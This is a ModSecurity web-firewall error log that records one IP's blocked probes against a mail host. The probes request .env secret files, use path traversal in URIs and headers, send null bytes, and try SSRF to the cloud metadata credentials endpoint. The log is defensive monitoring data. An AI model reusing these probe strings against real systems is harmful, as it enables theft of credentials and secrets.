[Tue May 12 05:22:03.955691 2026] [security2:error] [pid 1820198:tid 1820218] [client 45.148.10.238:29592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/.env"] [unique_id "agKc281tk6y7yBJLpJo39QAAAJI"]
[Tue May 12 05:22:05.173330 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.238:29638] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env~"] [unique_id "agKc3c1tk6y7yBJLpJo39gAAAIk"]
[Tue May 12 05:22:05.173500 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.238:29638] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env~"] [unique_id "agKc3c1tk6y7yBJLpJo39gAAAIk"]
[Tue May 12 05:22:05.177613 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.238:29646] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKc3QgpmE1yW0glLdgsNgAAAMw"]
[Tue May 12 05:22:05.177804 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.238:29646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKc3QgpmE1yW0glLdgsNgAAAMw"]
[Tue May 12 05:22:05.180725 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.238:29620] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc3RfeipD4uoG21FouyAAAAAI"]
[Tue May 12 05:22:05.180776 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.238:29620] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc3RfeipD4uoG21FouyAAAAAI"]
[Tue May 12 05:22:05.180805 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.238:29620] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc3RfeipD4uoG21FouyAAAAAI"]
[Tue May 12 05:22:05.181015 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.238:29620] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc3RfeipD4uoG21FouyAAAAAI"]
[Tue May 12 05:22:05.181084 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.238:29620] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc3RfeipD4uoG21FouyAAAAAI"]
[Tue May 12 05:22:05.181129 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.238:29620] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc3RfeipD4uoG21FouyAAAAAI"]
[Tue May 12 05:22:05.181479 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.238:29620] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc3RfeipD4uoG21FouyAAAAAI"]
[Tue May 12 05:22:05.189823 2026] [core:error] [pid 1825287:tid 1825319] [client 45.148.10.238:29596] AH10244: invalid URI path (/static../../../../.env)
[Tue May 12 05:22:06.357537 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.238:54108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc1BfeipD4uoG21FouswAAAAg"]
[Tue May 12 05:22:06.358060 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.238:54168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc1BfeipD4uoG21FousQAAAA4"]
[Tue May 12 05:22:08.176330 2026] [security2:error] [pid 1825287:tid 1825314] [client 45.148.10.238:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc1AgpmE1yW0glLdgsJwAAAMk"]
[Tue May 12 05:22:08.710806 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.238:54156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc1Nr1yOh9TvizezidZwAAAE8"]
[Tue May 12 05:22:08.792451 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.238:29746] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mail.letamsgarage.fr"] [uri "/_next/image/"] [unique_id "agKc4M1tk6y7yBJLpJo3-QAAAI0"]
[Tue May 12 05:22:08.793237 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.238:29746] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/_next/image/"] [unique_id "agKc4M1tk6y7yBJLpJo3-QAAAI0"]
[Tue May 12 05:22:08.800460 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.238:29760] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKc4PaAnTZtx1_H_wy1NgAAAU8"]
[Tue May 12 05:22:08.800581 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.238:29760] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKc4PaAnTZtx1_H_wy1NgAAAU8"]
[Tue May 12 05:22:08.800766 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.238:29760] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKc4PaAnTZtx1_H_wy1NgAAAU8"]
[Tue May 12 05:22:08.817029 2026] [security2:error] [pid 1842385:tid 1842409] [client 45.148.10.238:29802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.staging"] [unique_id "agKc4Bs7kySIUZ3ORnIkhAAAARI"]
[Tue May 12 05:22:08.817168 2026] [security2:error] [pid 1842385:tid 1842409] [client 45.148.10.238:29802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.staging"] [unique_id "agKc4Bs7kySIUZ3ORnIkhAAAARI"]
[Tue May 12 05:22:08.824584 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.238:29772] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc4Nr1yOh9TvizezidiAAAAFE"]
[Tue May 12 05:22:08.824659 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.238:29772] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc4Nr1yOh9TvizezidiAAAAFE"]
[Tue May 12 05:22:08.824699 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.238:29772] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc4Nr1yOh9TvizezidiAAAAFE"]
[Tue May 12 05:22:08.824938 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.238:29772] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc4Nr1yOh9TvizezidiAAAAFE"]
[Tue May 12 05:22:08.824990 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.238:29772] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc4Nr1yOh9TvizezidiAAAAFE"]
[Tue May 12 05:22:08.825373 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.238:29772] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc4Nr1yOh9TvizezidiAAAAFE"]
[Tue May 12 05:22:10.237514 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.238:54030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc1M1tk6y7yBJLpJo35gAAAIs"]
[Tue May 12 05:22:11.275138 2026] [:error] [pid 1808852:tid 1808879] [client 20.226.81.141:42894] File does not exist: /home/cpcentre/public_html/mh.php
[Tue May 12 05:22:12.180919 2026] [:error] [pid 1808852:tid 1808879] [client 20.226.81.141:42894] File does not exist: /home/cpcentre/public_html/fs.php
[Tue May 12 05:22:12.220428 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.238:29834] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mail.letamsgarage.fr"] [uri "/_next/image/"] [unique_id "agKc5M1tk6y7yBJLpJo3_AAAAIU"]
[Tue May 12 05:22:12.230742 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.238:29834] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/_next/image/"] [unique_id "agKc5M1tk6y7yBJLpJo3_AAAAIU"]
[Tue May 12 05:22:12.230753 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:29856] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.backup"] [unique_id "agKc5PaAnTZtx1_H_wy1OQAAAVA"]
[Tue May 12 05:22:12.230927 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:29856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.backup"] [unique_id "agKc5PaAnTZtx1_H_wy1OQAAAVA"]
[Tue May 12 05:22:12.237136 2026] [security2:error] [pid 1808852:tid 1808858] [client 45.148.10.238:29836] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKc5BfeipD4uoG21Fou1AAAAAM"]
